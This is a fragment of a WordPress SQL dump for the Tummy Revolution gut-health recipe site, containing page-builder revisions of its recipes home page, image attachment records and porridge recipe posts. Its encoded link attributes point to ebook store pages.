custom_links=\"#E-8_aHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvbSUyRlR1bW15LVJldm9sdXRpb24taGVhbHRoLW1hZGUtc2ltcGxlLWVib29rJTJGZHAlMkZCMDdIUkZES0MxJTJDaHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvLnVrJTJGVHVtbXktUmV2b2x1dGlvbi1oZWFsdGgtbWFkZS1zaW1wbGUtZWJvb2slMkZkcCUyRkIwN0hSRkRLQzElMkZyZWYlM0Rzcl8xXzElM0ZpZSUzRFVURjglMjZxaWQlM0QxNTQzNjQ1ODAyJTI2c3IlM0Q4LTElMjZrZXl3b3JkcyUzRHR1bW15JTJCcmV2b2x1dGlvbiUyQjIxJTI1MkMlMkJndXQlMkJoZWFsdGglMkNodHRwcyUzQSUyRiUyRml0dW5lcy5hcHBsZS5jb20lMkZhdSUyRmJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGUlMkZpZDE0NDQ1NTE5ODIlM0ZtdCUzRDExJTJDaHR0cHMlM0ElMkYlMkZ3d3cua29iby5jb20lMkZ3dyUyRmVuJTJGZWJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGU=\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587683909457-e99f5c24-a85e-8\" taxonomies=\"92\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-23 23:19:16','2020-04-23 23:19:16','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5368,1,'2020-04-23 23:22:05','2020-04-23 23:22:05','[vc_row][vc_column][vc_gallery type=\"flexslider_slide\" interval=\"3\" images=\"5214,5217,5220,5223\" img_size=\"medium\" onclick=\"custom_link\" custom_links_target=\"_blank\" custom_links=\"#E-8_aHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvbSUyRlR1bW15LVJldm9sdXRpb24taGVhbHRoLW1hZGUtc2ltcGxlLWVib29rJTJGZHAlMkZCMDdIUkZES0MxJTJDaHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvLnVrJTJGVHVtbXktUmV2b2x1dGlvbi1oZWFsdGgtbWFkZS1zaW1wbGUtZWJvb2slMkZkcCUyRkIwN0hSRkRLQzElMkZyZWYlM0Rzcl8xXzElM0ZpZSUzRFVURjglMjZxaWQlM0QxNTQzNjQ1ODAyJTI2c3IlM0Q4LTElMjZrZXl3b3JkcyUzRHR1bW15JTJCcmV2b2x1dGlvbiUyQjIxJTI1MkMlMkJndXQlMkJoZWFsdGglMkNodHRwcyUzQSUyRiUyRml0dW5lcy5hcHBsZS5jb20lMkZhdSUyRmJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGUlMkZpZDE0NDQ1NTE5ODIlM0ZtdCUzRDExJTJDaHR0cHMlM0ElMkYlMkZ3d3cua29iby5jb20lMkZ3dyUyRmVuJTJGZWJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGU=\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587684014091-9cdc318b-44e8-1\" taxonomies=\"92\"][/vc_column][/vc_row][vc_row][vc_column][vc_btn title=\"Load More Recipes\" link=\"url:http%3A%2F%2Ftummyrevolution.com%2Frecipe-list%2F|title:Recipe%20List||\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-23 23:22:05','2020-04-23 23:22:05','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5369,1,'2020-04-23 23:25:22','2020-04-23 23:25:22','[vc_row][vc_column][vc_gallery type=\"flexslider_slide\" interval=\"3\" images=\"5214,5217,5220,5223\" img_size=\"medium\" onclick=\"custom_link\" custom_links_target=\"_blank\" custom_links=\"#E-8_aHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvbSUyRlR1bW15LVJldm9sdXRpb24taGVhbHRoLW1hZGUtc2ltcGxlLWVib29rJTJGZHAlMkZCMDdIUkZES0MxJTJDaHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvLnVrJTJGVHVtbXktUmV2b2x1dGlvbi1oZWFsdGgtbWFkZS1zaW1wbGUtZWJvb2slMkZkcCUyRkIwN0hSRkRLQzElMkZyZWYlM0Rzcl8xXzElM0ZpZSUzRFVURjglMjZxaWQlM0QxNTQzNjQ1ODAyJTI2c3IlM0Q4LTElMjZrZXl3b3JkcyUzRHR1bW15JTJCcmV2b2x1dGlvbiUyQjIxJTI1MkMlMkJndXQlMkJoZWFsdGglMkNodHRwcyUzQSUyRiUyRml0dW5lcy5hcHBsZS5jb20lMkZhdSUyRmJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGUlMkZpZDE0NDQ1NTE5ODIlM0ZtdCUzRDExJTJDaHR0cHMlM0ElMkYlMkZ3d3cua29iby5jb20lMkZ3dyUyRmVuJTJGZWJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGU=\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587684135961-e7d30993-3bde-1\" taxonomies=\"92\"][/vc_column][/vc_row][vc_row][vc_column][vc_btn title=\"Load More Recipes\" color=\"white\" link=\"url:http%3A%2F%2Ftummyrevolution.com%2Frecipe-list%2F|title:Recipe%20List||\" css=\".vc_custom_1587684320269{background-color: #f75013 !important;}\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-23 23:25:22','2020-04-23 23:25:22','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5370,1,'2020-04-23 23:26:35','2020-04-23 23:26:35','[vc_row][vc_column][vc_gallery type=\"flexslider_slide\" interval=\"3\" images=\"5214,5217,5220,5223\" img_size=\"medium\" onclick=\"custom_link\" custom_links_target=\"_blank\" custom_links=\"#E-8_aHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvbSUyRlR1bW15LVJldm9sdXRpb24taGVhbHRoLW1hZGUtc2ltcGxlLWVib29rJTJGZHAlMkZCMDdIUkZES0MxJTJDaHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvLnVrJTJGVHVtbXktUmV2b2x1dGlvbi1oZWFsdGgtbWFkZS1zaW1wbGUtZWJvb2slMkZkcCUyRkIwN0hSRkRLQzElMkZyZWYlM0Rzcl8xXzElM0ZpZSUzRFVURjglMjZxaWQlM0QxNTQzNjQ1ODAyJTI2c3IlM0Q4LTElMjZrZXl3b3JkcyUzRHR1bW15JTJCcmV2b2x1dGlvbiUyQjIxJTI1MkMlMkJndXQlMkJoZWFsdGglMkNodHRwcyUzQSUyRiUyRml0dW5lcy5hcHBsZS5jb20lMkZhdSUyRmJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGUlMkZpZDE0NDQ1NTE5ODIlM0ZtdCUzRDExJTJDaHR0cHMlM0ElMkYlMkZ3d3cua29iby5jb20lMkZ3dyUyRmVuJTJGZWJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGU=\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587684339845-220f0919-5b0d-1\" taxonomies=\"92\"][/vc_column][/vc_row][vc_row][vc_column][vc_btn title=\"Load More Recipes\" color=\"white\" align=\"center\" link=\"url:http%3A%2F%2Ftummyrevolution.com%2Frecipe-list%2F|title:Recipe%20List|target:%20_blank|\" css=\".vc_custom_1587684393949{background-color: #f75013 !important;}\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-23 23:26:35','2020-04-23 23:26:35','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5371,1,'2020-04-23 23:27:49','2020-04-23 23:27:49','[vc_row][vc_column][vc_gallery type=\"flexslider_slide\" interval=\"3\" images=\"5214,5217,5220,5223\" img_size=\"medium\" onclick=\"custom_link\" custom_links_target=\"_blank\" custom_links=\"#E-8_aHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvbSUyRlR1bW15LVJldm9sdXRpb24taGVhbHRoLW1hZGUtc2ltcGxlLWVib29rJTJGZHAlMkZCMDdIUkZES0MxJTJDaHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvLnVrJTJGVHVtbXktUmV2b2x1dGlvbi1oZWFsdGgtbWFkZS1zaW1wbGUtZWJvb2slMkZkcCUyRkIwN0hSRkRLQzElMkZyZWYlM0Rzcl8xXzElM0ZpZSUzRFVURjglMjZxaWQlM0QxNTQzNjQ1ODAyJTI2c3IlM0Q4LTElMjZrZXl3b3JkcyUzRHR1bW15JTJCcmV2b2x1dGlvbiUyQjIxJTI1MkMlMkJndXQlMkJoZWFsdGglMkNodHRwcyUzQSUyRiUyRml0dW5lcy5hcHBsZS5jb20lMkZhdSUyRmJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGUlMkZpZDE0NDQ1NTE5ODIlM0ZtdCUzRDExJTJDaHR0cHMlM0ElMkYlMkZ3d3cua29iby5jb20lMkZ3dyUyRmVuJTJGZWJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGU=\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587684406128-9f0e9518-cc34-5\" taxonomies=\"92\"][/vc_column][/vc_row][vc_row][vc_column][vc_btn title=\"Load More Recipes\" color=\"juicy-pink\" align=\"center\" link=\"url:http%3A%2F%2Ftummyrevolution.com%2Frecipe-list%2F|title:Recipe%20List|target:%20_blank|\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-23 23:27:49','2020-04-23 23:27:49','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5372,1,'2020-04-23 23:29:04','2020-04-23 23:29:04','[vc_row][vc_column][vc_gallery type=\"flexslider_slide\" interval=\"3\" images=\"5214,5217,5220,5223\" img_size=\"medium\" onclick=\"custom_link\" custom_links_target=\"_blank\" custom_links=\"#E-8_aHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvbSUyRlR1bW15LVJldm9sdXRpb24taGVhbHRoLW1hZGUtc2ltcGxlLWVib29rJTJGZHAlMkZCMDdIUkZES0MxJTJDaHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvLnVrJTJGVHVtbXktUmV2b2x1dGlvbi1oZWFsdGgtbWFkZS1zaW1wbGUtZWJvb2slMkZkcCUyRkIwN0hSRkRLQzElMkZyZWYlM0Rzcl8xXzElM0ZpZSUzRFVURjglMjZxaWQlM0QxNTQzNjQ1ODAyJTI2c3IlM0Q4LTElMjZrZXl3b3JkcyUzRHR1bW15JTJCcmV2b2x1dGlvbiUyQjIxJTI1MkMlMkJndXQlMkJoZWFsdGglMkNodHRwcyUzQSUyRiUyRml0dW5lcy5hcHBsZS5jb20lMkZhdSUyRmJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGUlMkZpZDE0NDQ1NTE5ODIlM0ZtdCUzRDExJTJDaHR0cHMlM0ElMkYlMkZ3d3cua29iby5jb20lMkZ3dyUyRmVuJTJGZWJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGU=\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587684522486-c4fcefd9-0255-2\" taxonomies=\"92\"][/vc_column][/vc_row][vc_row][vc_column][vc_btn title=\"Load More Recipes\" color=\"juicy-pink\" align=\"center\" link=\"url:http%3A%2F%2Ftummyrevolution.com%2Frecipe-list%2Fpage%2F2%2F|title:Recipe%20List||\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-23 23:29:04','2020-04-23 23:29:04','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5374,1,'2020-04-27 08:18:52','2020-04-27 08:18:52','\n\n\n\n\n\n\n\n\n\n\n\n\n\n','Buy Book','','inherit','closed','closed','','5255-revision-v1','','','2020-04-27 08:18:52','2020-04-27 08:18:52','',5255,'http://tummyrevolution.com/5255-revision-v1/',0,'revision','',0),(5375,1,'2020-04-27 08:20:17','2020-04-27 08:20:17','\n\n\n\n\n\n\n\n\n\n\n\n\n\n','Buy Book','','inherit','closed','closed','','5255-revision-v1','','','2020-04-27 08:20:17','2020-04-27 08:20:17','',5255,'http://tummyrevolution.com/5255-revision-v1/',0,'revision','',0),(5376,1,'2020-04-27 08:32:14','2020-04-27 08:32:14','\n\n\n\n\n\n\n\n\n\n\n\n\n\n','Buy Book','','inherit','closed','closed','','5255-revision-v1','','','2020-04-27 08:32:14','2020-04-27 08:32:14','',5255,'http://tummyrevolution.com/5255-revision-v1/',0,'revision','',0),(5377,1,'2020-04-27 08:50:09','2020-04-27 08:50:09','\n\n\n\n\n\n\n\n\n\n\n\n\n\n','Buy Book','','inherit','closed','closed','','5255-revision-v1','','','2020-04-27 08:50:09','2020-04-27 08:50:09','',5255,'http://tummyrevolution.com/5255-revision-v1/',0,'revision','',0),(5378,1,'2020-04-27 09:35:14','2020-04-27 09:35:14','','New-book-slider-UK-Ama','','inherit','open','closed','','new-book-slider-uk-ama','','','2020-04-27 09:35:36','2020-04-27 09:35:36','',1117,'http://tummyrevolution.com/wp-content/uploads/2020/04/New-book-slider-UK-Ama.jpg',0,'attachment','image/jpeg',0),(5379,1,'2020-04-27 08:52:24','2020-04-27 08:52:24','','book slider AmazonUS','','inherit','open','closed','','book-slider-amazonus-2','','','2020-04-27 08:52:24','2020-04-27 08:52:24','',1117,'http://tummyrevolution.com/wp-content/uploads/2020/04/book-slider-AmazonUS-1.jpg',0,'attachment','image/jpeg',0),(5380,1,'2020-04-27 08:52:28','2020-04-27 08:52:28','','book slider Apple','','inherit','open','closed','','book-slider-apple','','','2020-04-27 08:52:28','2020-04-27 08:52:28','',1117,'http://tummyrevolution.com/wp-content/uploads/2020/04/book-slider-Apple.jpg',0,'attachment','image/jpeg',0),(5381,1,'2020-04-27 08:53:46','2020-04-27 08:53:46','[vc_row][vc_column][vc_gallery type=\"flexslider_slide\" interval=\"3\" images=\"5214,5217,5220,5223,5378,5379,5380\" img_size=\"medium\" onclick=\"custom_link\" custom_links_target=\"_blank\" custom_links=\"#E-8_aHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvbSUyRlR1bW15LVJldm9sdXRpb24taGVhbHRoLW1hZGUtc2ltcGxlLWVib29rJTJGZHAlMkZCMDdIUkZES0MxJTJDaHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvLnVrJTJGVHVtbXktUmV2b2x1dGlvbi1oZWFsdGgtbWFkZS1zaW1wbGUtZWJvb2slMkZkcCUyRkIwN0hSRkRLQzElMkZyZWYlM0Rzcl8xXzElM0ZpZSUzRFVURjglMjZxaWQlM0QxNTQzNjQ1ODAyJTI2c3IlM0Q4LTElMjZrZXl3b3JkcyUzRHR1bW15JTJCcmV2b2x1dGlvbiUyQjIxJTI1MkMlMkJndXQlMkJoZWFsdGglMkNodHRwcyUzQSUyRiUyRml0dW5lcy5hcHBsZS5jb20lMkZhdSUyRmJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGUlMkZpZDE0NDQ1NTE5ODIlM0ZtdCUzRDExJTJDaHR0cHMlM0ElMkYlMkZ3d3cua29iby5jb20lMkZ3dyUyRmVuJTJGZWJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGU=\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587977480169-6fa3bced-b151-10\" taxonomies=\"92\"][/vc_column][/vc_row][vc_row][vc_column][vc_btn title=\"Load More Recipes\" color=\"juicy-pink\" align=\"center\" link=\"url:http%3A%2F%2Ftummyrevolution.com%2Frecipe-list%2Fpage%2F2%2F|title:Recipe%20List||\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-27 08:53:46','2020-04-27 08:53:46','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5382,1,'2020-04-27 08:55:33','2020-04-27 08:55:33','','book slider pic4','','inherit','open','closed','','book-slider-pic4-2','','','2020-04-27 08:55:33','2020-04-27 08:55:33','',1117,'http://tummyrevolution.com/wp-content/uploads/2020/04/book-slider-pic4-1.jpg',0,'attachment','image/jpeg',0),(5383,1,'2020-04-27 08:57:24','2020-04-27 08:57:24','[vc_row][vc_column][vc_gallery type=\"flexslider_slide\" interval=\"3\" images=\"5214,5217,5220,5223,5382\" img_size=\"medium\" onclick=\"custom_link\" custom_links_target=\"_blank\" custom_links=\"#E-8_aHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvbSUyRlR1bW15LVJldm9sdXRpb24taGVhbHRoLW1hZGUtc2ltcGxlLWVib29rJTJGZHAlMkZCMDdIUkZES0MxJTJDaHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvLnVrJTJGVHVtbXktUmV2b2x1dGlvbi1oZWFsdGgtbWFkZS1zaW1wbGUtZWJvb2slMkZkcCUyRkIwN0hSRkRLQzElMkZyZWYlM0Rzcl8xXzElM0ZpZSUzRFVURjglMjZxaWQlM0QxNTQzNjQ1ODAyJTI2c3IlM0Q4LTElMjZrZXl3b3JkcyUzRHR1bW15JTJCcmV2b2x1dGlvbiUyQjIxJTI1MkMlMkJndXQlMkJoZWFsdGglMkNodHRwcyUzQSUyRiUyRml0dW5lcy5hcHBsZS5jb20lMkZhdSUyRmJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGUlMkZpZDE0NDQ1NTE5ODIlM0ZtdCUzRDExJTJDaHR0cHMlM0ElMkYlMkZ3d3cua29iby5jb20lMkZ3dyUyRmVuJTJGZWJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGU=\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587977691147-bd2b8401-df25-5\" taxonomies=\"92\"][/vc_column][/vc_row][vc_row][vc_column][vc_btn title=\"Load More Recipes\" color=\"juicy-pink\" align=\"center\" link=\"url:http%3A%2F%2Ftummyrevolution.com%2Frecipe-list%2Fpage%2F2%2F|title:Recipe%20List||\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-27 08:57:24','2020-04-27 08:57:24','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5384,1,'2020-04-27 09:43:42','2020-04-27 09:43:42','[vc_row][vc_column][vc_gallery type=\"flexslider_slide\" interval=\"3\" images=\"5223,5378\" img_size=\"medium\" onclick=\"custom_link\" custom_links_target=\"_blank\" custom_links=\"#E-8_aHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvbSUyRlR1bW15LVJldm9sdXRpb24taGVhbHRoLW1hZGUtc2ltcGxlLWVib29rJTJGZHAlMkZCMDdIUkZES0MxJTJDaHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvLnVrJTJGVHVtbXktUmV2b2x1dGlvbi1oZWFsdGgtbWFkZS1zaW1wbGUtZWJvb2slMkZkcCUyRkIwN0hSRkRLQzElMkZyZWYlM0Rzcl8xXzElM0ZpZSUzRFVURjglMjZxaWQlM0QxNTQzNjQ1ODAyJTI2c3IlM0Q4LTElMjZrZXl3b3JkcyUzRHR1bW15JTJCcmV2b2x1dGlvbiUyQjIxJTI1MkMlMkJndXQlMkJoZWFsdGglMkNodHRwcyUzQSUyRiUyRml0dW5lcy5hcHBsZS5jb20lMkZhdSUyRmJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGUlMkZpZDE0NDQ1NTE5ODIlM0ZtdCUzRDExJTJDaHR0cHMlM0ElMkYlMkZ3d3cua29iby5jb20lMkZ3dyUyRmVuJTJGZWJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGU=\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587980562352-b31f4718-bca4-7\" taxonomies=\"92\"][/vc_column][/vc_row][vc_row][vc_column][vc_btn title=\"Load More Recipes\" color=\"juicy-pink\" align=\"center\" link=\"url:http%3A%2F%2Ftummyrevolution.com%2Frecipe-list%2Fpage%2F2%2F|title:Recipe%20List||\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-27 09:43:42','2020-04-27 09:43:42','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5385,1,'2020-04-27 09:46:08','2020-04-27 09:46:08','[vc_row][vc_column][vc_gallery type=\"flexslider_slide\" interval=\"3\" images=\"5223,5382,5217,5379\" img_size=\"medium\" onclick=\"custom_link\" custom_links_target=\"_blank\" custom_links=\"#E-8_aHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvbSUyRlR1bW15LVJldm9sdXRpb24taGVhbHRoLW1hZGUtc2ltcGxlLWVib29rJTJGZHAlMkZCMDdIUkZES0MxJTJDaHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvLnVrJTJGVHVtbXktUmV2b2x1dGlvbi1oZWFsdGgtbWFkZS1zaW1wbGUtZWJvb2slMkZkcCUyRkIwN0hSRkRLQzElMkZyZWYlM0Rzcl8xXzElM0ZpZSUzRFVURjglMjZxaWQlM0QxNTQzNjQ1ODAyJTI2c3IlM0Q4LTElMjZrZXl3b3JkcyUzRHR1bW15JTJCcmV2b2x1dGlvbiUyQjIxJTI1MkMlMkJndXQlMkJoZWFsdGglMkNodHRwcyUzQSUyRiUyRml0dW5lcy5hcHBsZS5jb20lMkZhdSUyRmJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGUlMkZpZDE0NDQ1NTE5ODIlM0ZtdCUzRDExJTJDaHR0cHMlM0ElMkYlMkZ3d3cua29iby5jb20lMkZ3dyUyRmVuJTJGZWJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGU=\"][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587980709583-88a8b309-f836-7\" taxonomies=\"92\"][/vc_column][/vc_row][vc_row][vc_column][vc_btn title=\"Load More Recipes\" color=\"juicy-pink\" align=\"center\" link=\"url:http%3A%2F%2Ftummyrevolution.com%2Frecipe-list%2Fpage%2F2%2F|title:Recipe%20List||\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-27 09:46:08','2020-04-27 09:46:08','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5386,1,'2020-04-27 10:15:17','2020-04-27 10:15:17','\n\n\n\n\n\n\n\n\n\n\n\n\n\n','Get the Book','','inherit','closed','closed','','5255-revision-v1','','','2020-04-27 10:15:17','2020-04-27 10:15:17','',5255,'http://tummyrevolution.com/5255-revision-v1/',0,'revision','',0),(5389,1,'2020-04-27 10:48:26','2020-04-27 10:48:26','\n

What a better way to start a morning, so near to Christmas, than with this festive porridge!

\n\n\n\n

At Tummy Revolution, we make our porridge with gluten free oats (40g) and almond milk (300ml). Today we have added: banana, star fruit, peanut butter, dark chocolate and a handful of crumbled pecans.  You can never have enough toppings...

\n\n\n\n
\n

\n
\n','FESTIVE PORRIDGE','','inherit','closed','closed','','4799-revision-v1','','','2020-04-27 10:48:26','2020-04-27 10:48:26','',4799,'http://tummyrevolution.com/4799-revision-v1/',0,'revision','',0),(5391,1,'2020-04-27 10:54:41','2020-04-27 10:54:41','','blownie1 sfw','','inherit','open','closed','','blownie1-sfw','','','2020-04-27 10:54:41','2020-04-27 10:54:41','',4759,'http://tummyrevolution.com/wp-content/uploads/2020/04/blownie1-sfw.jpg',0,'attachment','image/jpeg',0),(5392,1,'2020-04-27 11:00:51','2020-04-27 11:00:51','','_MG_0781-2','','inherit','open','closed','','_mg_0781-2','','','2020-04-27 11:00:51','2020-04-27 11:00:51','',4741,'http://tummyrevolution.com/wp-content/uploads/2020/04/MG_0781-2.jpg',0,'attachment','image/jpeg',0),(5393,1,'2020-04-27 11:01:56','2020-04-27 11:01:56','','_MG_0777','','inherit','open','closed','','_mg_0777','','','2020-04-27 11:01:56','2020-04-27 11:01:56','',4741,'http://tummyrevolution.com/wp-content/uploads/2020/04/MG_0777.jpg',0,'attachment','image/jpeg',0),(5394,1,'2020-04-27 11:02:07','2020-04-27 11:02:07','\n

If you, like me, grew up eating bland boring porridge, you might not get that exciting at the thought of having porridge for breakfast. But it can be much more exciting if you just add the right things to it. 
Porridge is a bit like potatoes - quite plain and boring if served on their own but if you add things such as butter, salt or spices potatoes taste lovely. The same goes for porridge and when you start experimenting by mixing your porridge with healthy ingredients you might just find that porridge can be a delicious and excellent breakfast. Porridge is of course also great for your tummy and health with healthy fiber and micronutrients to set you up for a good start to the day.

\n\n\n\n
\"\"/
\n\n\n\n

Now, there\'s lots of things you can mix your porridge with so the best thing is to choose a few and then add them to your porridge one at the time to see if you like the mix.

\n\n\n\n

Some ingredients can be better to mix in with your orridge such as vanilla paste/extract, maple syrup, mashed banana. Whilst others work better as a topping such as berries, fruit, nuts and seeds. But you might find that you prefer mixing it all up and that\'s fine too - whatever takes your fancy :)

For today we\'ve chosen to make a bit of a tropical themed porridge with pineapple and banana. We also mixed the porridge with a few drops of vanilla paste and some maple syrup. It\'s a really lovely mix and takes a bland porridge to a totally new level. See the recipe below.

\n\n\n\n

We made this porridge with water and then added milk, but if you prefer your porridge a bit creamier you can make the porridge with some type of milk such as almond, rice or lactose free milk.

\n\n\n\n

Here are some of our other favourite tummy friendly porridge toppings to try out:

\n\n\n\n

Fruit:
Banana, Pineapple, passion fruit, kiwi, 

Berries:
Blueberries, raspberries and strawberries

\n\n\n\n

Nuts:
Macadamia nuts, walnuts and pecan nuts

Seeds:
Sunflower seeds, chia seeds and sunflower seeds

Other:
Dark chocolate (let it melt on the porridge or stir it in), maple syrup, peanut butter, vanilla paste or extract.

\n\n\n\n
\"\"/
\n\n\n\n


If you suffer with a sensitive tummy it\'s worth remembering to add small portions of fruit, berries and chocolate or similar rather then large. Large portions can upset a sensitive tummy so avoid overloading your porridge however tempting it may be. 

\n\n\n\n

TROPICAL PORRIDGE: 

\n\n\n\n

Makes 1 Serving
½ cup (50 g) porridge oats (Choose gluten free oats if you have coeliac disease) 
1 ½ cup (350ml) water or almond, rice or lactose free milk 

Toppings
5-8 pineapple chunks
3-5 slices of banana
1-2 drops of vanilla paste/extract
1/2 tbsp maple syrup

\n\n\n\n

Directions
1. Put the oats in a small saucepan, pour over your preferred milk or water. Bring to boil and simmer for 4-5 minutes, stirring occasionally and watching that it doesn’t catch the bottom of the pan. 
2. To serve, pour into a bowl and add or stir in the the toppings. Serve hot!

\n','Tropical porridge','','inherit','closed','closed','','4741-revision-v1','','','2020-04-27 11:02:07','2020-04-27 11:02:07','',4741,'http://tummyrevolution.com/4741-revision-v1/',0,'revision','',0),(5396,1,'2020-04-29 10:51:09','2020-04-29 10:51:09','[vc_row][vc_column][vc_gallery interval=\"3\" images=\"5421,5418,5420\" img_size=\"large\" onclick=\"custom_link\" custom_links_target=\"_blank\" 